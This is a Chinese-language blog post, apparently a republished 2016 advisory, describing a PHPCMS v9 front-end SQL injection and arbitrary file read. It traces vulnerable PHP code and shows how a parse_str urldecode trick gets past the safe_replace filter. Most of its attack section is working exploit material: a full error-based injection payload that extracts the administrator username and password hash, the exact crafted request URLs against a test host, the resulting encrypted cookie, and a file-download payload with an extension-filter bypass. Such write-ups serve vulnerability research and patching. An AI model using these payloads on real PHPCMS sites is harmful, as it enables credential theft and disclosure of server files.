美文网首页
PHPCMS 前台注入/任意文件读取

PHPCMS 前台注入/任意文件读取

作者: 索马里的乌贼 | 来源:发表于2018-08-09 22:43 被阅读0次
    1. 发布时间:2016-09-04
    2. 公开时间:N/A
    3. 漏洞类型:变量覆盖
    4. 危害等级:高
    5. 漏洞编号:xianzhi-2016-09-44267058
    6. 测试版本:N/A

    漏洞详情

    phpcms/modules/content/down.php

    public function init() {
            $a_k = trim($_GET['a_k']);
            if(!isset($a_k)) showmessage(L('illegal_parameters'));
            $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
            if(empty($a_k)) showmessage(L('illegal_parameters'));
            unset($i,$m,$f);
            parse_str($a_k);
            if(isset($i)) $i = $id = intval($i);
            if(!isset($m)) showmessage(L('illegal_parameters'));
            if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));
            if(empty($f)) showmessage(L('url_invalid'));
            $allow_visitor = 1;
            $MODEL = getcache('model','commons');
            $tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];
            $this->db->table_name = $tablename.'_data';
            $rs = $this->db->get_one(array('id'=>$id));
    

    $_GET['a_k']经过sys_auth解密之后 进入parse_str函数
    if(isset($i)) $i = $id = intval($i);
    且当$a_k中不存在$i时 $id不会被$i覆盖
    parse_str()参数可控的话 就可以任意构造$id值进入下方sql查询
    $rs = $this->db->get_one(array('id'=>$id));
    由于经过sys_auth()解密 所以不存在非法字符被过滤的情况
    sys_auth()函数其实就是dz的authcode() 不知道key想解密或者伪造内容几乎是不可能的
    所以来看看系统调用中 有没有用户可控数据进入sys_auth函数来替我们生成注入payload
    phpcms/libs/classes/param.class.php 行86

        public static function set_cookie($var, $value = '', $time = 0) {
            $time = $time > 0 ? $time : ($value == '' ? SYS_TIME - 3600 : 0);
            $s = $_SERVER['SERVER_PORT'] == '443' ? 1 : 0;
            $var = pc_base::load_config('system','cookie_pre').$var;
            $_COOKIE[$var] = $value;
            if (is_array($value)) {
                foreach($value as $k=>$v) {
                    setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
                }
            } else {
                setcookie($var, sys_auth($value, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
            }
        }
    

    $value参数经过sys_auth被设置到cookie
    再看看有没有$value可控的地方
    phpcms/modules/attachment/attachments.php 行238

     public function swfupload_json() {
            $arr['aid'] = intval($_GET['aid']);
            $arr['src'] = safe_replace(trim($_GET['src']));
            $arr['filename'] = urlencode(safe_replace($_GET['filename']));
            $json_str = json_encode($arr);
            $att_arr_exist = param::get_cookie('att_json');
            $att_arr_exist_tmp = explode('||', $att_arr_exist);
            if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {
                return true;
            } else {
                $json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;
                param::set_cookie('att_json',$json_str);
                return true;            
            }
        }
    

    aid被intval了 不行
    filename被urlencode了 也不行
    src正好 虽然经过了safe_replace函数的过滤 下面会说怎么绕过
    这里可以看到 src经过json_encode之后被set_cookie()
    json_encode并不会破坏我们的payload 所以只要看看怎么绕过safe_replace函数

    function safe_replace($string) {
        $string = str_replace('%20','',$string);
        $string = str_replace('%27','',$string);
        $string = str_replace('%2527','',$string);
        $string = str_replace('','',$string);
        $string = str_replace('"','"',$string);
        $string = str_replace("'",'',$string);
        $string = str_replace('"','',$string);
        $string = str_replace(';','',$string);
        $string = str_replace('<','&lt;',$string);
        $string = str_replace('>','&gt;',$string);
        $string = str_replace("{",'',$string);
        $string = str_replace('}','',$string);
        $string = str_replace('\','',$string);
        return $string;
    }
    

    过滤了很多东西 基本上注入跨站都不太可能,不过init()方法中有个好东西parse_str()
    parse_str()可是会自动urldecode()的噢
    所以 如果我们提交id=b%'27经过safe_replace()就会变成id=b%27再经过parse_str() 就会初始化$id=b'成功引入单引号

    测试方法

    先根据init()函数逻辑来生成payload如下

    &id=%'27 and (select 1 from (select count(%'2a),concat((select concat(username,0x3a,password) from v9_admin limit 1),floor(rand(0)%'2a2))x from information_schema.tables group by x)a)#&m=1&f=haha&modelid=2&catid=7&

    %'27引入单引号
    %'2a引入星号(因为星号也被safe_replace函数过滤了)
    前后要加上& 因为经过json_encode 前后会加上其他数据 加上&之后 id就会独立的被parse_str()初始化了
    再urlencode一下 提交

    http://192.168.1.170/phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25'27+and+(select+1+from+(select+count(%25'2a)%2Cconcat((select+concat(username%2C0x3a%2Cpassword)+from+v9_admin+limit+1)%2Cfloor(rand(0)%25'2a2))x+from+information_schema.tables+group+by+x)a)%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26&filename=asdfadsf

    记录下返回COOKIE中的xxxx_attr_json

    d515pn-KiZhUqh-gIddIcgWKki9WK9vxquneqront2XWWohUsNbxrpE-PgwVYEYwEXtR7fVrfIg1P99ewxvsV6c83WF89m4bw-nV2LaKWrMXtXh3Z4GcvPQrveoF2yqTsMkAaBWfNytC4j7CgE5i2eQWsXJbxrJCwPZHl1R2bl14m5feT2_ok3fcnciVhhuvAcjdXnLlQ-3gmyENTue5-hP57S20Yj7o7FFc0m14M3WUYwPpcd1ZMvltmv6fr3a2YRlOtC0siSh8YnIqAnvULDCpH0MpB9VcMclL_zD3nd9OwLW7lFz4AF9L14QaDDutfkj1y6dBVimSIhVcdeEvi6XHt_SVATbL4HcVjd5tBn0oFFcfLBEKf-gQvrqivSn_xoHqTroT19vIgtV2F82M39Tb0Wkexhp16tuwAOf83uw1nEy99hhfAD4-2xgD1g5gKTTi3it728PE_5phVE3g2bb8O9XPIGjVGWELyjJbIDOtSN4K377I5x6nTOGN7iYtlf9eD2HTzoukaeQvoKwtt96NH1cUCd6WgUtgjpCwaDASmdmNrZfR9C-m4Ulj6ohn1q8H_PF8ESnAsO-KpRmmPC3zrMn8jHdXSu5SRWU0A9KjsoXBODx1hmk5hLQ4JHdhqvVVFeI2eZTCoc_AUiur3_3S3BdVaQN4J3HDds7gg12dL2rMquMbCOxJe5yNvYFqjqY0jQQUu0LucZkvaHfiTA

    然后提交给

    http://192.168.1.170/phpcms/index.php?m=content&c=down&a_k=刚才拿到的cookie

    view.png

    再来说下任意文件读取 上面的payload改一下

    &i=4&s=目录&m=1&f=文件名&d=1&modelid=2&catid=7&

    就可以下载任意文件 不过有个过滤

    if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)/i',$fileurl) ) showmessage(L('url_error'));
    

    当然绕过也是非常轻松
    比如下载index.php
    只要改成index.p%'3cp 经过safe_replace变成index.p%3cp经过parse_str()变成index.p<p windows下就能读取到了

    相关文章

      网友评论

          本文标题:PHPCMS 前台注入/任意文件读取

          本文链接:https://www.haomeiwen.com/subject/tcrhbftx.html